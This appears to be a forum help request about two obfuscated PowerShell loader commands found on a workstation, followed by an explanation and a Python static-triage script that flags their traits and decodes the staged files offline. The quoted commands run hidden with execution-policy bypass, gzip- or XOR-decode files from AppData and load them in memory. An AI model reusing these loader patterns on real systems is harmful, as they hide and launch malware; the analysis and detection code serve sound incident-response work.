We detected the scripts below on one of our computers this morning. I’m pretty sure they are malicious based on how they look and what they appear to be doing. The folders they reference contain dozens of files with random file names and extensions. They also appear to be tied to some startup process or program.
Where I fall short is understanding what these scripts are actually doing, and I’m hoping I can get some help. I understand that the scripts are running hidden, setting the execution policy to bypass, and then calling a script block. After that it seems to either call, create, or manipulate objects and then connect to files.
"PowerShell.exe" -windOWStYLe hIddEN -eP BYpASs -commAnD "[sYsTem.refLEcTion.ASsEmBly]::LoAD({$a7118bfda6d4b8af0cb14447ec219=NEW-ObJeCt SYStEm.IO.MEMorySTreAm(, $ArGS[0]);$abab1a4d8b348e881f740374eb4eb=neW-oBject SystEM.IO.mEmoRYsTReAM;$a41c73041894c69d901cdb652dcd8=NeW-oBjeCT SYSteM.IO.cOmPRESsIOn.gZipstrEAM $a7118bfda6d4b8af0cb14447ec219, ([IO.COmprESsIon.comPReSSioNmODE]::DecOmPrEss);$a41c73041894c69d901cdb652dcd8.coPyTO($abab1a4d8b348e881f740374eb4eb);$a41c73041894c69d901cdb652dcd8.CLose();$a7118bfda6d4b8af0cb14447ec219.CLOse();reTuRN $abab1a4d8b348e881f740374eb4eb.toaRRay();}.inVoKE([SYsteM.Io.fiLE]::REadALlByteS('C:\Users\jdoe\AppData\Roaming\aDobe\TefpYOdEvcLAk\ZeoLwxHmUPAuRViqY.MiOzuJQlZGYeaEq')));[abe9358f57541eab841f83b9a944d.a3e8233974540f924b73c817a287c]::ac7f32ed5624da88d2fee302b2b18()"
"PowerShell.exe" -wINDoWStYLe hIDDEN -eP BypasS -comMand "$a7997fcd41e4a3b768a6bf953e6cc='QHJTM01eTkBtP0B8S3M2Xm81WUpAUzImMUB7Nk9oXlBqKGhAcjl3OV4wS09mQHZnWHVAd0teKUB0JV5QXlBqZXhAVU19Y0B1LUg3QFY+ZDBeMHVfUS0/O0ZzdyFpWVVxQE1Ad2tZbkB3fmpHPlg0ZkFnU0BFb3NHKitvbVotaC1rQ1REKG9QZVY2bld2UVN4fllmamdOKld6eHhlT3luZWVga3JTcTFkd2VxeChqUGpEQnFWbHgwal97a2p5entTdmxKS2pLeEFCXnJoVnpHIW9BWiYwelc=';$a77abf52b7d407808df1ba9745490=[sySTEm.IO.filE]::rEAdALLbytES('C:\Users\jdoe\AppData\Roaming\mIcROSoFt\YOSEmKhDtVvawIMuCQk\dZBIhKAtEGYsg.qNyFOJtMwvWmEfZ');fOr($aa9ae30d8304f0b78e86582ea3b85=0;$aa9ae30d8304f0b78e86582ea3b85 -Lt $a77abf52b7d407808df1ba9745490.COUNT;){FOr($a439a9ddd664bfbdee23d2c082e8b=0;$a439a9ddd664bfbdee23d2c082e8b -lT $a7997fcd41e4a3b768a6bf953e6cc.lEnGtH;$a439a9ddd664bfbdee23d2c082e8b++){$a77abf52b7d407808df1ba9745490[$aa9ae30d8304f0b78e86582ea3b85]=$a77abf52b7d407808df1ba9745490[$aa9ae30d8304f0b78e86582ea3b85] -BXoR $a7997fcd41e4a3b768a6bf953e6cc[$a439a9ddd664bfbdee23d2c082e8b];$aa9ae30d8304f0b78e86582ea3b85++;IF($aa9ae30d8304f0b78e86582ea3b85 -ge $a77abf52b7d407808df1ba9745490.cOuNT){$a439a9ddd664bfbdee23d2c082e8b=$a7997fcd41e4a3b768a6bf953e6cc.LengTH}}};[SYSTem.ReFlectIOn.aSsEmbLY]::loaD($a77abf52b7d407808df1ba9745490);[aa1d6f4e60d4f0b9a10f9031f4877.af35bb34041454ba3d18c1a462992]::a2be604cdf64df868f7a43ea5911b()"
Any help would be appreciated,
James
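The two command lines in the post are staged loaders: the first reads a file from AppData\Roaming, gunzips it in memory and hands the result to Reflection.Assembly::Load; the second reads a file, decodes it with a repeating-key XOR (the key is the literal characters of the quoted string, not its base64 decoding, because PowerShell indexes the string itself) and loads that. The following triage helper is an added example, not code from James's post or from any analysis of these samples. It never executes the suspect command; it only inspects the text for the indicators the post shows (hidden window, policy bypass, reflective load, gzip, -bxor, AppData staging), pulls out the referenced file paths and the XOR key, and reproduces the two decoding transforms so a copy of the staged file can be recovered and hashed offline. All command lines, paths, the key and the "payload" bytes below are constructed placeholders, not the real samples.

```python
"""Static triage for obfuscated PowerShell loader command lines (added example).

Does NOT run anything from the command line. Extracts the artifacts an
analyst wants (staged file paths, XOR key string) and reproduces the two
decoding transforms (gzip inflate, repeating-key XOR) so the dropped
stage can be recovered and hashed without ever calling Assembly.Load.
"""
import gzip
import hashlib
import re

# Indicator patterns for the loader shape seen in the post. All matching is
# case-insensitive because the samples randomise letter case to dodge naive
# string matches; the regexes also accept PowerShell's abbreviated switches.
INDICATORS = {
    "hidden_window":   r"-w(?:indowstyle)?\s+hidden",
    "policy_bypass":   r"-e[a-z]*\s+bypass",
    "reflective_load": r"reflection\.assembly\]::load",
    "gzip_inflate":    r"gzipstream",
    "xor_loop":        r"-bxor",
    "appdata_staging": r"appdata\\roaming\\",
}
# Accept straight and curly quotes: forum software often rewrites them.
QUOTES = "'\u2018\u2019\""
PATH_RE = re.compile(r"readallbytes\(\s*[" + QUOTES + r"]([^" + QUOTES + r"]+)", re.I)
KEY_RE = re.compile(r"=\s*[" + QUOTES + r"]([A-Za-z0-9+/=]{16,})[" + QUOTES + r"]\s*;")


def triage(cmdline: str) -> dict:
    """Return which indicators fire plus the extracted paths and XOR key."""
    fired = [name for name, pat in INDICATORS.items() if re.search(pat, cmdline, re.I)]
    key_match = KEY_RE.search(cmdline)
    return {
        "indicators": fired,
        "score": len(fired),
        "paths": PATH_RE.findall(cmdline),
        "key": key_match.group(1) if key_match else None,
    }


def recover_gzip_stage(staged: bytes) -> bytes:
    """Transform performed by the first loader: inflate the staged file."""
    return gzip.decompress(staged)


def recover_xor_stage(staged: bytes, key: str) -> bytes:
    """Transform performed by the second loader's nested for-loops.

    The script XORs data[i] with key[j], cycling j over the key string, so
    this is a plain repeating-key XOR whose key bytes are the characters of
    the quoted string (NOT its base64 decoding). XOR is its own inverse.
    """
    key_bytes = key.encode("ascii")
    return bytes(b ^ key_bytes[i % len(key_bytes)] for i, b in enumerate(staged))


def sha256_hex(data: bytes) -> str:
    """Hash for the recovered stage, suitable for lookup in threat intel."""
    return hashlib.sha256(data).hexdigest()


# ---- constructed sample inputs (placeholders, not the real samples) ---------
SAMPLE_KEY = "Cons7ructedKeyStr1ng+/="          # constructed XOR key string
SAMPLE_PAYLOAD = b"MZ\x90\x00" + b"constructed stand-in for a staged .NET assembly"

SAMPLE_CMD_GZIP = (
    '"PowerShell.exe" -windOWStYLe hIddEN -eP BYpASs -commAnD "'
    "[sYsTem.refLEcTion.ASsEmBly]::LoAD({NeW-oBjeCT SYSteM.IO.cOmPRESsIOn.gZipstrEAM $ARGS[0]}"
    ".inVoKE([SYsteM.Io.fiLE]::REadALlByteS('C:\\Users\\EXAMPLE\\AppData\\Roaming\\Adobe\\STAGEDIR\\STAGE1.bin')))\""
)
SAMPLE_CMD_XOR = (
    '"PowerShell.exe" -wINDoWStYLe hIDDEN -eP BypasS -comMand "$k=\'' + SAMPLE_KEY + "';"
    "$d=[sySTEm.IO.filE]::rEAdALLbytES('C:\\Users\\EXAMPLE\\AppData\\Roaming\\Microsoft\\STAGEDIR\\STAGE2.bin');"
    "fOr($i=0;$i -Lt $d.COUNT;){FOr($j=0;$j -lT $k.lEnGtH;$j++){$d[$i]=$d[$i] -BXoR $k[$j];$i++;"
    'IF($i -ge $d.cOuNT){$j=$k.LengTH}}};[SYSTem.ReFlectIOn.aSsEmbLY]::loaD($d)"'
)


def build_constructed_stages() -> tuple:
    """Produce (gzip_stage, xor_stage) from the constructed payload for the demo."""
    return gzip.compress(SAMPLE_PAYLOAD), recover_xor_stage(SAMPLE_PAYLOAD, SAMPLE_KEY)


if __name__ == "__main__":
    for cmd in (SAMPLE_CMD_GZIP, SAMPLE_CMD_XOR):
        print(triage(cmd))
    gz_stage, xor_stage = build_constructed_stages()
    print("gzip stage  ->", sha256_hex(recover_gzip_stage(gz_stage)))
    print("xor stage   ->", sha256_hex(recover_xor_stage(xor_stage, SAMPLE_KEY)))
```

In practice you would feed `triage()` the command line captured from the scheduled task, Run key or startup entry that launches these, then copy the two referenced files off the host and pass their bytes to the matching `recover_*` function; the resulting SHA-256 is what to search for in your EDR and threat-intelligence sources, and the recovered bytes can be inspected as a .NET assembly without ever being loaded.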